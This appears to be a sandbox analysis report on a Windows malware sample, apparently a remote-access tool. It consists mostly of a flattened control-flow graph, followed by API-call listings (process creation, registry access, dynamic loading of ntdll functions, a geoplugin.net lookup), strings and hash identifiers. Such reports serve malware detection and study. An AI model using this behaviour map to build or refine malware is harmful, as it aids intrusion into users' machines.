___scrt_fastfail 46722->46723 46725 425ba0 46723->46725 46729 425bc5 46723->46729 46740 41ec4c 21 API calls 46723->46740 46725->46729 46733 425ba5 46725->46733 46741 420669 46 API calls 46725->46741 46728 425bae 46728->46729 46744 424d96 21 API calls 2 library 
calls 46728->46744 46729->46708 46731 425c48 46731->46729 46742 432f55 21 API calls ___std_exception_copy 46731->46742 46733->46728 46733->46729 46743 41daf0 49 API calls 46733->46743 46734->46709 46735->46709 46736->46710 46737->46710 46738->46711 46739->46713 46740->46725 46741->46731 46742->46733 46743->46728 46744->46729 46745 43bea8 46748 43beb4 _swprintf ___FrameUnwindToState 46745->46748 46746 43bec2 46761 44062d 20 API calls __dosmaperr 46746->46761 46748->46746 46749 43beec 46748->46749 46756 445909 EnterCriticalSection 46749->46756 46751 43bec7 pre_c_initialization ___FrameUnwindToState 46752 43bef7 46757 43bf98 46752->46757 46756->46752 46758 43bfa6 46757->46758 46758->46758 46760 43bf02 46758->46760 46763 4497ec 37 API calls 2 library calls 46758->46763 46762 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 46760->46762 46761->46751 46762->46751 46763->46758 46764 434918 46765 434924 ___FrameUnwindToState 46764->46765 46791 434627 46765->46791 46767 43492b 46769 434954 46767->46769 47089 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46767->47089 46774 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46769->46774 47090 4442d2 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46769->47090 46771 43496d 46773 434973 ___FrameUnwindToState 46771->46773 47091 444276 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46771->47091 46781 4349f3 46774->46781 47092 443487 36 API calls 5 library calls 46774->47092 46802 434ba5 46781->46802 46784 434a15 46785 434a1f 46784->46785 47094 4434bf 28 API calls _abort 46784->47094 46787 434a28 46785->46787 47095 443462 28 API calls _abort 46785->47095 47096 43479e 13 API calls 2 library calls 46787->47096 46790 434a30 46790->46773 46792 434630 46791->46792 47097 434cb6 IsProcessorFeaturePresent 46792->47097 46794 43463c 47098 438fb1 10 API calls 4 library calls 46794->47098 46796 
434641 46801 434645 46796->46801 47099 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46796->47099 46798 43464e 46799 43465c 46798->46799 47100 438fda 8 API calls 3 library calls 46798->47100 46799->46767 46801->46767 47101 436f10 46802->47101 46805 4349f9 46806 444223 46805->46806 47103 44f0d9 46806->47103 46808 44422c 46810 434a02 46808->46810 47107 446895 36 API calls 46808->47107 46811 40ea00 46810->46811 47109 41cbe1 LoadLibraryA GetProcAddress 46811->47109 46813 40ea1c GetModuleFileNameW 47114 40f3fe 46813->47114 46815 40ea38 46816 4020f6 28 API calls 46815->46816 46817 40ea47 46816->46817 46818 4020f6 28 API calls 46817->46818 46819 40ea56 46818->46819 47129 41beac 46819->47129 46823 40ea68 46824 401e8d 11 API calls 46823->46824 46825 40ea71 46824->46825 46826 40ea84 46825->46826 46827 40eace 46825->46827 47419 40fbee 97 API calls 46826->47419 47155 401e65 46827->47155 46830 40eade 46834 401e65 22 API calls 46830->46834 46831 40ea96 46832 401e65 22 API calls 46831->46832 46833 40eaa2 46832->46833 47420 410f72 36 API calls __EH_prolog 46833->47420 46835 40eafd 46834->46835 47160 40531e 46835->47160 46838 40eab4 47421 40fb9f 78 API calls 46838->47421 46839 40eb0c 47165 406383 46839->47165 46843 40eabd 47422 40f3eb 71 API calls 46843->47422 46847 401fd8 11 API calls 46848 40eb2d 46847->46848 46850 401fd8 11 API calls 46848->46850 46849 401fd8 11 API calls 46851 40ef36 46849->46851 46852 40eb36 46850->46852 47093 443396 GetModuleHandleW 46851->47093 46853 401e65 22 API calls 46852->46853 46854 40eb3f 46853->46854 47179 401fc0 46854->47179 46856 40eb4a 46857 401e65 22 API calls 46856->46857 46858 40eb63 46857->46858 46859 401e65 22 API calls 46858->46859 46860 40eb7e 46859->46860 46861 40ebe9 46860->46861 47423 406c59 46860->47423 46862 401e65 22 API calls 46861->46862 46867 40ebf6 46862->46867 46864 40ebab 46865 401fe2 28 API calls 46864->46865 46866 40ebb7 46865->46866 46869 401fd8 11 API 
calls 46866->46869 46868 40ec3d 46867->46868 46874 413584 3 API calls 46867->46874 47183 40d0a4 46868->47183 46871 40ebc0 46869->46871 47428 413584 RegOpenKeyExA 46871->47428 46872 40ec43 46873 40eac6 46872->46873 47186 41b354 46872->47186 46873->46849 46880 40ec21 46874->46880 46878 40f38a 47511 4139e4 30 API calls 46878->47511 46879 40ec5e 46881 40ecb1 46879->46881 47203 407751 46879->47203 46880->46868 47431 4139e4 30 API calls 46880->47431 46884 401e65 22 API calls 46881->46884 46886 40ecba 46884->46886 46895 40ecc6 46886->46895 46896 40eccb 46886->46896 46888 40f3a0 47512 4124b0 65 API calls ___scrt_fastfail 46888->47512 46889 40ec87 46893 401e65 22 API calls 46889->46893 46890 40ec7d 47432 407773 30 API calls 46890->47432 46905 40ec90 46893->46905 46894 40f3aa 46898 41bcef 28 API calls 46894->46898 47435 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46895->47435 46901 401e65 22 API calls 46896->46901 46897 40ec82 47433 40729b 98 API calls 46897->47433 46902 40f3ba 46898->46902 46903 40ecd4 46901->46903 47312 413a5e RegOpenKeyExW 46902->47312 47207 41bcef 46903->47207 46905->46881 46909 40ecac 46905->46909 46906 40ecdf 47211 401f13 46906->47211 47434 40729b 98 API calls 46909->47434 46913 401f09 11 API calls 46915 40f3d7 46913->46915 46916 401f09 11 API calls 46915->46916 46918 40f3e0 46916->46918 47315 40dd7d 46918->47315 46919 401e65 22 API calls 46921 40ecfc 46919->46921 46924 401e65 22 API calls 46921->46924 46926 40ed16 46924->46926 46925 40f3ea 46927 401e65 22 API calls 46926->46927 46928 40ed30 46927->46928 46929 401e65 22 API calls 46928->46929 46930 40ed49 46929->46930 46931 40edb6 46930->46931 46933 401e65 22 API calls 46930->46933 46932 40edc5 46931->46932 46939 40ef41 ___scrt_fastfail 46931->46939 46934 40edce 46932->46934 46962 40ee4a ___scrt_fastfail 46932->46962 46937 40ed5e _wcslen 46933->46937 46935 401e65 22 API calls 46934->46935 46936 40edd7 46935->46936 46938 401e65 22 API calls 46936->46938 46937->46931 46940 401e65 22 
API calls 46937->46940 46941 40ede9 46938->46941 47496 413733 RegOpenKeyExA 46939->47496 46942 40ed79 46940->46942 46944 401e65 22 API calls 46941->46944 46946 401e65 22 API calls 46942->46946 46945 40edfb 46944->46945 46949 401e65 22 API calls 46945->46949 46947 40ed8e 46946->46947 47436 40da6f 46947->47436 46948 40ef8c 46950 401e65 22 API calls 46948->46950 46951 40ee24 46949->46951 46952 40efb1 46950->46952 46957 401e65 22 API calls 46951->46957 47233 402093 46952->47233 46955 401f13 28 API calls 46956 40edad 46955->46956 46959 401f09 11 API calls 46956->46959 46960 40ee35 46957->46960 46959->46931 47494 40ce34 46 API calls _wcslen 46960->47494 46961 40efc3 47239 4137aa RegCreateKeyA 46961->47239 47223 413982 46962->47223 46967 40eede ctype 46971 401e65 22 API calls 46967->46971 46968 40ee45 46968->46962 46969 401e65 22 API calls 46970 40efe5 46969->46970 47245 43bb2c 46970->47245 46972 40eef5 46971->46972 46972->46948 46976 40ef09 46972->46976 46975 40effc 47499 41ce2c 88 API calls ___scrt_fastfail 46975->47499 46978 401e65 22 API calls 46976->46978 46977 40f01f 46983 402093 28 API calls 46977->46983 46980 40ef12 46978->46980 46981 41bcef 28 API calls 46980->46981 46985 40ef1e 46981->46985 46982 40f003 CreateThread 46982->46977 48222 41d4ee 10 API calls 46982->48222 46984 40f034 46983->46984 46986 402093 28 API calls 46984->46986 47495 40f4af 107 API calls 46985->47495 46988 40f043 46986->46988 47249 41b580 46988->47249 46989 40ef23 46989->46948 46991 40ef2a 46989->46991 46991->46873 46993 401e65 22 API calls 46994 40f054 46993->46994 46995 401e65 22 API calls 46994->46995 46996 40f066 46995->46996 46997 401e65 22 API calls 46996->46997 46998 40f086 46997->46998 46999 43bb2c 40 API calls 46998->46999 47000 40f093 46999->47000 47001 401e65 22 API calls 47000->47001 47002 40f09e 47001->47002 47003 401e65 22 API calls 47002->47003 47004 40f0af 47003->47004 47005 401e65 22 API calls 47004->47005 47006 40f0c4 47005->47006 47007 401e65 22 API calls 47006->47007 47008 
40f0d5 47007->47008 47009 40f0dc StrToIntA 47008->47009 47273 409e1f 47009->47273 47012 401e65 22 API calls 47013 40f0f7 47012->47013 47014 40f103 47013->47014 47015 40f13c 47013->47015 47500 43455e 47014->47500 47017 401e65 22 API calls 47015->47017 47019 40f14c 47017->47019 47022 40f194 47019->47022 47023 40f158 47019->47023 47020 401e65 22 API calls 47021 40f11f 47020->47021 47024 40f126 CreateThread 47021->47024 47026 401e65 22 API calls 47022->47026 47025 43455e new 22 API calls 47023->47025 47024->47015 48219 41a045 113 API calls __EH_prolog 47024->48219 47027 40f161 47025->47027 47028 40f19d 47026->47028 47029 401e65 22 API calls 47027->47029 47031 40f207 47028->47031 47032 40f1a9 47028->47032 47030 40f173 47029->47030 47035 40f17a CreateThread 47030->47035 47033 401e65 22 API calls 47031->47033 47034 401e65 22 API calls 47032->47034 47036 40f210 47033->47036 47037 40f1b9 47034->47037 47035->47022 48224 41a045 113 API calls __EH_prolog 47035->48224 47038 40f255 47036->47038 47039 40f21c 47036->47039 47040 401e65 22 API calls 47037->47040 47298 41b69e GetComputerNameExW GetUserNameW 47038->47298 47042 401e65 22 API calls 47039->47042 47043 40f1ce 47040->47043 47045 40f225 47042->47045 47507 40da23 32 API calls 47043->47507 47050 401e65 22 API calls 47045->47050 47046 401f13 28 API calls 47047 40f269 47046->47047 47049 401f09 11 API calls 47047->47049 47052 40f272 47049->47052 47053 40f23a 47050->47053 47051 40f1e1 47054 401f13 28 API calls 47051->47054 47055 40f27b SetProcessDEPPolicy 47052->47055 47056 40f27e CreateThread 47052->47056 47064 43bb2c 40 API calls 47053->47064 47057 40f1ed 47054->47057 47055->47056 47058 40f293 CreateThread 47056->47058 47059 40f29f 47056->47059 48192 40f7e2 47056->48192 47060 401f09 11 API calls 47057->47060 47058->47059 48220 412132 139 API calls 47058->48220 47062 40f2b4 47059->47062 47063 40f2a8 CreateThread 47059->47063 47061 40f1f6 CreateThread 47060->47061 47061->47031 48221 401be9 50 API calls 47061->48221 47066 40f307 
[Control-flow graph edge list omitted: extraction flattened the interactive graph widget into node addresses, source->target edges and per-node API-call counts, which are not readable as text.]

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
• GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                          • API String ID: 4236061018-3687161714
                                                                                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1099 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1104 41b456-41b477 InternetReadFile 1099->1104 1105 41b479-41b499 call 4020b7 call 403376 call 401fd8 1104->1105 1106 41b49d-41b4a0 1104->1106 1105->1106 1108 41b4a2-41b4a4 1106->1108 1109 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1106->1109 1108->1104 1108->1109 1112 41b4b8-41b4c2 1109->1112
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                          Strings
                                                                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                          • API String ID: 3121278467-91888290
                                                                                          • Opcode ID: abe68a4eb927ca0f04f94675361b010e13c10aeedf850dedc819be2a7387801d
                                                                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                          • Opcode Fuzzy Hash: abe68a4eb927ca0f04f94675361b010e13c10aeedf850dedc819be2a7387801d
                                                                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                          • ExitProcess.KERNEL32 ref: 0040F905
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                          • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                          • API String ID: 2281282204-1392497409
                                                                                          • Opcode ID: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                          • Opcode Fuzzy Hash: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1191 404f51-404f5f 1192 404f65-404f6c 1191->1192 1193 404fea 1191->1193 1195 404f74-404f7b 1192->1195 1196 404f6e-404f72 1192->1196 1194 404fec-404ff1 1193->1194 1197 404fc0-404fe8 CreateEventA CreateThread 1195->1197 1198 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1195->1198 1196->1197 1197->1194 1198->1197
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                          Strings
                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 2532271599-1507639952
                                                                                          • Opcode ID: bb891c265521bbac9f5eb37e18d522f6691bbdaa432d4adda5fe173935d73b6f
                                                                                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                          • Opcode Fuzzy Hash: bb891c265521bbac9f5eb37e18d522f6691bbdaa432d4adda5fe173935d73b6f
                                                                                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                          APIs
                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,011BD630), ref: 004338DA
                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1815803762-0
                                                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                          APIs
                                                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Name$ComputerUser
                                                                                          • String ID:
                                                                                          • API String ID: 4229901323-0
                                                                                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 99 40ec27-40ec3d call 401fab call 4139e4 79->99 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 99->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->203 179 
